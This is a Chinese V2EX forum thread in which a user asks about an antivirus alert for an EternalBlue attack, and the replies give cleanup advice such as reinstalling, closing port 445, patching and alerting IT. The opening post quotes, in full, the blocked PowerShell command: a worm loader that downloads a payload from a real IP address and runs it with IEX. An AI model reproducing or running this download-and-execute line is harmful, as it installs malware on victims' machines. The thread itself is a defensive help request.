公司电脑,火绒提示被攻击,这是啥情况

2020-02-28 14:24:34 +08:00
 shadowyue

操作进程:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

命令行:powershell -c "try{$localIf=$flase;New-Object Threading.Mutex($true,'Global\eLocalIf',[ref]$localIf)}catch{};$ifmd5='1cd2db7421c0b88eb89eb6182bd6785e';$ifp=$env:tmp+'\if.bin';$down_url='http://207.154.225.82';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)|foreach{$s+=$.ToString('X2')};return $s}if(test-path $ifp){$con=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(New-Object Net.WebClient)."downloaddata"($down_url+'/if.bin?SZXHRZZLIT036&9CBD7D74-E8C3-6E51-230D-12457CECDB29&DC:4A:3E:76:02:A0');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}IEX(-join[char[]]$con)"

攻击方式:Exploit/EternalBlue

远程地址:10.83.3.33:445

防御结果:已阻止

6847 次点击
所在节点    程序员
37 条回复
shadowyue
2020-02-28 15:59:11 +08:00
@Shazoo 这个 js 文件从浏览器访问不到
shadowyue
2020-02-28 16:00:31 +08:00
@Osk 杀了隔十几分钟会又出来,在杀毒了,试试
ThirdFlame
2020-02-28 16:07:45 +08:00
你的电脑已经被控制了。 通过 powershell 执行恶意代码 ing
shadowyue
2020-02-28 16:19:07 +08:00
@ThirdFlame 怎么处理啊,大佬
WordTian
2020-02-28 16:26:55 +08:00
备份好重要文件,重装系统吧,联网前关掉 445 端口
juded
2020-02-28 16:32:20 +08:00
火绒行为管理不错,但查杀能力太差了。
vocaloid
2020-02-28 16:37:37 +08:00
把 powershell 进程先杀掉啊。。要不还会干更多的事情
ihacku
2020-02-28 16:46:08 +08:00
这个动作本身已经被拦截了
你没有打补丁,可以在火绒里面打下补丁重启生效
可以通知 IT 发下 10.83.3.33 这台机器中毒了 杀毒打补丁
内网应该不止这一台被感染的
Osk
2020-02-28 16:51:26 +08:00
@shadowyue 那我还是建议重装了, 如果非要清理, 最好进入离线系统, 使用其它杀毒软件对 C 盘全盘扫描, 离线的原因是避免恶意程序对自身做隐藏或者干扰.

查杀完成后, 还需要在离线系统(干净的 PE 中)使用 autoruns 等工具对所有的 驱动, 服务, 自启动等项目手工排查, 一些恶意程序隐藏的很好, 我觉得这一步是必须的.

最后问题来了: 都这么麻烦了, 还不如重装.


重装后: 先不要联网, 防火墙关闭 smb v1(445), rdp(3389) 等端口, 不然处在毒窝中分分钟死灰复燃. 不过, 使用最新的 Windows 10 1909 镜像也不要太紧张, 大部分局域网传播的严重漏洞已经封好了.
wanguorui123
2020-02-28 17:07:42 +08:00
永恒之蓝的变种蠕虫病毒有点多
Ailoli
2020-02-28 18:34:22 +08:00
之前公司同事电脑出现过,后面断网全盘查杀就解决了
jousca
2020-02-28 18:37:07 +08:00
内网里攻击你那台电脑中了蠕虫,永恒之蓝漏洞。
manami
2020-02-28 18:40:27 +08:00
你需要卡巴斯基!
Buges
2020-02-28 18:45:28 +08:00
emptyiscolor
2020-02-29 11:15:11 +08:00
@shadowyue 利用驱动人生后门进行传播的木马,建议直接重装系统然后安装主流杀软吧
zdswater
2020-05-20 22:05:44 +08:00
中奖了,火绒扫了一遍杀了还有。不知道咋处理了
zdswater
2020-05-20 22:06:07 +08:00

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/648332

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX